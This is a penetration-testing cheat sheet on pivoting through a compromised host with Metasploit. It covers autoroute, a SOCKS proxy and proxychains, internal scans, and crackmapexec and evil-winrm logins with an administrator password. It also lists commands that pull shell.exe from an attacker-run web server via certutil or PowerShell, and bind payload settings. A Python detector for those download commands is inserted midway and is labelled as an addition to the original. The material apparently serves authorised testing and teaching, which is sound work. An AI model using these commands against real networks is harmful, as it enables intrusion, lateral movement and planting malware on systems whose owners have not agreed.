Pivot & Internal Network Access
Autoroute - Layer 3 Pivot via Meterpreter
```
# From within the pivot host's Meterpreter session:
run autoroute -s 192.168.0.0/24    # Add route to internal network
run autoroute -p                   # Print active routes
background

# Alternative - post module
use post/multi/manage/autoroute
set SESSION <id>
set SUBNET 192.168.0.0
set NETMASK 255.255.255.0
run
```
SOCKS Proxy
```
use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run -j
```
```
# /etc/proxychains4.conf
socks4 127.0.0.1 9050
```
Note: Do not set `Proxies socks4:127.0.0.1:9050` on MSF modules that already use autoroute - the two mechanisms conflict. Use `proxychains` only for external binaries.
Host Discovery Through Pivot
| Command | Description |
|---|---|
| use post/multi/gather/ping_sweep | ICMP ping sweep via Meterpreter (works through autoroute). |
| set RHOSTS 192.168.0.1-254 | Target range. |
| set SESSION <id> | Pivot session ID. |
| use auxiliary/scanner/portscan/tcp | TCP port scan through autoroute. |

Note: `arp_sweep` operates at layer 2 and cannot traverse an autoroute tunnel. Always use `ping_sweep` or `portscan/tcp` for internal network discovery.
External Tools Through Proxychains
| Command | Description |
|---|---|
| proxychains nmap -sT -Pn -p 22,80,445,3389,5985,10000 192.168.0.51 | Nmap TCP connect scan through proxy (must use -sT, not -sS: a SYN scan crafts raw packets, which a SOCKS proxy cannot carry). |
| proxychains crackmapexec smb 192.168.0.61 -u administrator -p pass | CME SMB through proxy. |
| proxychains crackmapexec winrm 192.168.0.61 -u administrator -p pass | CME WinRM through proxy. |
| proxychains evil-winrm -i 192.168.0.61 -u administrator -p pass | evil-winrm through proxy. |
| proxychains curl http://192.168.0.51:10000/ | HTTP through proxy. |
Port Forwarding - Meterpreter portfwd
| Command | Description |
|---|---|
| portfwd add -l <local_port> -p <remote_port> -r <remote_IP> | Forward local port to remote host:port through pivot. |
| portfwd add -l 8080 -p 80 -r 192.168.0.51 | Access internal host port 80 via localhost:8080. |
| portfwd add -l 10000 -p 10000 -r 192.168.0.51 | Access internal host Webmin via localhost:10000. |
| portfwd add -R -l <lport> -p <rport> -L <kali_IP> | Reverse port forward - route internal host traffic back to Kali. |
| portfwd list | List active port forwards. |
| portfwd delete -l <local_port> | Remove a specific forward. |
| portfwd flush | Remove all port forwards. |
Bind vs. Reverse Payloads
| Situation | Payload type | Why |
|---|---|---|
| Internal host can reach Kali | Reverse TCP | Standard - target connects back to Kali |
| Internal host cannot reach Kali (pivot) | Bind TCP | Metasploit connects to the target through the route |
```
# Bind payload example - Metasploit connects to the target
set payload cmd/unix/bind_perl                 # Linux
set payload windows/x64/meterpreter/bind_tcp   # Windows
set RHOST <internal_target_IP>                 # bind payloads connect to RHOST (the target); LHOST is not used
run
```
Payload Transfer to Internal Hosts (Windows)
| Command | Description |
|---|---|
| certutil -urlcache -split -f http://<kali_IP>:8080/shell.exe C:\Windows\Temp\shell.exe | Download payload via certutil (no PowerShell needed). |
| powershell -c "Invoke-WebRequest http://<kali_IP>:8080/shell.exe -OutFile C:\Temp\shell.exe" | Download via PowerShell. |
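Defender's view of the two download commands above, as an added example that is not part of the original cheat sheet: a small Python detector that flags certutil `-urlcache` and PowerShell `Invoke-WebRequest ... -OutFile` downloads in process-creation command lines. The sample command lines and the 10.0.0.5 address are constructed, and the severity rule (drop into a writable directory = high) is an assumption.

```python
import re

# Constructed sample process-creation command lines (Sysmon Event 1 / 4688 style);
# not from the page or any real log. 10.0.0.5 is a made-up attacker address.
SAMPLE_CMDLINES = [
    r'certutil -urlcache -split -f http://10.0.0.5:8080/shell.exe C:\Windows\Temp\shell.exe',
    r'powershell -c "Invoke-WebRequest http://10.0.0.5:8080/shell.exe -OutFile C:\Temp\shell.exe"',
    r'certutil -hashfile C:\Windows\System32\cmd.exe SHA256',   # benign certutil use
    r'powershell -c "Get-Process | Sort-Object CPU"',            # benign PowerShell use
]

URL_RE = re.compile(r'(https?://[^\s"\']+)', re.IGNORECASE)
CERTUTIL_RE = re.compile(r'\bcertutil(?:\.exe)?\b', re.IGNORECASE)
# Invoke-WebRequest and its built-in alias iwr
IWR_RE = re.compile(r'\b(?:Invoke-WebRequest|iwr)\b', re.IGNORECASE)
OUTFILE_RE = re.compile(r'-OutFile\s+("[^"]+"|\S+)', re.IGNORECASE)
# Directories where a freshly dropped binary is most suspicious (assumed list)
WRITABLE_DIRS = ('\\temp\\', '\\tmp\\', '\\users\\public\\', '\\appdata\\', '\\programdata\\')


def classify(cmdline):
    """Return a finding for a LOLBin-style download command line, or None if benign."""
    lowered = cmdline.lower()
    url = URL_RE.search(cmdline)
    if url is None:
        return None
    if CERTUTIL_RE.search(cmdline) and '-urlcache' in lowered:
        # certutil -urlcache -split -f <url> <dest>: the destination is the last token
        dest = cmdline.split()[-1].strip('"')
        technique = 'certutil_urlcache_download'
    elif IWR_RE.search(cmdline):
        m = OUTFILE_RE.search(cmdline)
        dest = m.group(1).strip('"') if m else None
        technique = 'powershell_invoke_webrequest_download'
    else:
        return None
    in_writable = dest is not None and any(d in dest.lower() for d in WRITABLE_DIRS)
    return {
        'technique': technique,
        'url': url.group(1),
        'dest': dest,
        'severity': 'high' if in_writable else 'medium',
    }


def scan(cmdlines):
    """Run classify() over many command lines and return only the findings."""
    return [f for f in (classify(c) for c in cmdlines) if f is not None]


if __name__ == '__main__':
    for finding in scan(SAMPLE_CMDLINES):
        print(finding)
```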
```
# Serve payload from Kali
python3 -m http.server 8080
```
Session Management
| Command | Description |
|---|---|
| sessions -l | List all active sessions. |
| sessions -i <id> | Interact with a session. |
| sessions -u <id> | Upgrade a shell to Meterpreter. |
| sessions -K | Kill all sessions. |